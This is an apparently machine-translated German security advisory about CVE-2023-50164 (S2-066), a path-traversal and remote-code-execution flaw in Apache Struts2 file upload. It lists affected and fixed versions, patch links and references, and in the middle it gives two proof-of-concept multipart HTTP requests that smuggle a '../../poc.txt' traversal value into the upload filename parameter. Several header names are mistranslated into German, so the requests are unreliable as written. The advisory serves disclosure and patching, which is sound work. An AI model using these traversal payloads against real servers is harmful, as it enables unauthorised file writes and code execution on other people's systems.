URGENT: Apache Struts2 Hochrisiko-Schwachstelle offenbart Remotecode-Ausführungsschwachstelle - Eskalieren Sie jetzt!

Apache Struts Codeausführungsschwachstelle (CVE-2023-50164) ermöglicht es einem Angreifer, die Parameter für den Datei-Upload zu kontrollieren, um Pfadüberquerungen durchzuführen und in einigen Fällen eine bösartige Datei hochzuladen, um beliebigen Code auszuführen.

Beschreibung der Schwachstelle:

Apache Struts2Struts 2 ist eine Open-Source-Webanwendungsarchitektur für die Entwicklung von Java EE-Webanwendungen. Sie nutzt und erweitert die Java Servlet-API und ermutigt Entwickler, die MVC-Architektur zu übernehmen. Apache hat eine Sicherheitswarnung für eine schwerwiegende Sicherheitslücke im Open-Source-Webanwendungs-Framework Struts 2 herausgegeben, die Folgendes zur Folge haben könnteEntfernte Code-Ausführung. Die Nummer der Schwachstelle lautetCVE-2023-50164die auf mangelhaften "Logik des Dateiuploads", was dazu führen kann, dass unbefugtePfadüberquerungund in der ausgenutzt, um bösartige Dateien hochzuladen und beliebige Codeausführung zu ermöglichen.

Auswirkungen der Schwachstelle:

2.5.0 <= Struts <= 2.5.32

6.0.0 <= Struts <= 6.3.0

 

Nachweis der Verwundbarkeit:

POC I:
--WebKitFormBoundary5WJ61X4PRwyYKlip
Inhalt-Disposition: form-data; name="Upload"; filename="poc.txt"
Inhalt-Typ: text/plain

Test

--WebKitFormBoundary5WJ61X4PRwyYKlip
Inhalt-Disposition: form-data; name="uploadFileName";

... /... /poc.txt

--WebKitFormBoundary5WJ61X4PRwyYKlip-

POC II:

POST /s2_066_war_exploded/upload.action?uploadFileName=... /... /poc.txt HTTP/1.1
Rechner: localhost:8080
Accept-Language: en-US,en;q=0.9
Benutzer-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/120.0.0.0 Safari/537.36
Akzeptanz-Encoding: gzip, deflate, br
Inhalt-Typ: multipart/form-data; boundary=--WebKitFormBoundary5WJ61X4PRwyYKlip
Cache-Kontrolle: max-age=0
Akzeptiert: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Inhalt-Länge: 593

--WebKitFormBoundary5WJ61X4PRwyYKlip
Inhalt-Disposition: form-data; name="Upload"; filename="poc.txt"
Inhalt-Typ: text/plain

Test

--WebKitFormBoundary5WJ61X4PRwyYKlip-

Fehlerbehebungen:

Es ist eine offizielle, aktualisierbare Version verfügbar, und den Benutzern wird empfohlen, so bald wie möglich auf eine sichere Version zu aktualisieren:

Struts >= 2.5.33

Struts >= 6.3.0.2

Patch: https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

Referenz:

https://cwiki.apache.org/confluence/display/WW/S2-066

https://github.com/apache/struts/compare/STRUTS_6_3_0…STRUTS_6_3_0_2#files_bucket

https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2Datei-Upload-Analyse-S2-066/

Originalartikel von Chief Security Officer, bei Vervielfältigung bitte angeben: https://cncso.com/de/neue-kritische-rce-schwachstelle-in-apache-struts2-html-entdeckt

Wie (2)
Vorherige Dezember 12, 2023 um 8:05 Uhr
Weiter 14. Dezember 2023 pm10:04

Empfohlen